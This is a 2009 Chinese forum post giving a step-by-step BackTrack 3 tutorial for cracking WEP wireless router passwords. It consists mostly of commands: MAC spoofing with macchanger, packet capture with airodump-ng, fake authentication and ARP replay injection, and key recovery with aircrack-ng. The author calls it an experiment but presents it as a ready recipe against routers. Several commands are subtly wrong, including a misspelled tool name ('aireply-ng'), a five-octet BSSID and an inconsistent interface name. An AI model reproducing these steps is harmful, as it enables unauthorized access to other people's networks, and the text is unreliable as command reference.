|
|
用BT3破解无线路由密码
由于无线网络的飞速发展,时下好多个人都用起了无线路由器,默认状态下无线路由是用WEP加密的,但稍有常识的人都会知道, WEP非常特别以及极其的不安全,下面我就用BT工具来做个实验,仅仅是实验。BT是BackTrack的缩写,它是基于Slackware和SLAX的自启动运行光盘,它包含了一套安全及计算机取证工具。它其实是依靠融合Auditor Security Linux和WHAX(先前的Whoppix)而创建成的。 里面集成了好多黑客工具,非常强大。废话就不多说了,破解开始:
1. 修改无线网卡的MAC地址
airmon-ng //返回 无线网卡列表
airmon-ng stop wifi0 //停止无线网卡
ifconfig wif0 down //停止无线网络
macchanger -m 00:11:22:33:44:55 wifi0 //修改网卡的mac地址
airmon-ng start wifi0 //修改后启动,应该是两个无线网卡,例如:ath0
2. 查找无线网络
airodump-ng ath0 //成功后会出现一个列表,而且不断的有pack进出,然后ctrl+c停止
3. 抓包
这里我先假设测试的无线路由名字(ESSID)叫Techippo,频道:11,MAC地址(BSSID):88:88:88:88:88:88
airodump-ng -c 11 -w dump –bssid 88:88:88:88:88 ath0 //dump为包的名字可随意命名
新开一个Shelll
aireply-ng -1 0 -e Techippo -b 88:88:88:88:88 -h 00:11:22:33:44:55 ath0
运行完这条命令后会显示关联成功,成功后才可以进行下一步操作,如果提示关联不成功有可能是信号太弱或者网卡不支持。
接下来在运行下面这条命令,抓包开始。不要关闭这个shell。
aireply-ng -3 -b 88:88:88:88:88 -h 00:11:22:33:44:55 ath0
4. 破解
再重新开一个Shell。运行下面这条命令。
aircrack-ng -n 64 -b 88:88:88:88:88 dump-01.cap
破解开始,在接下来出现的Key Found:后面显示的就是该无线路由的密码。 |
|
发表于 2009-7-20 12:48:05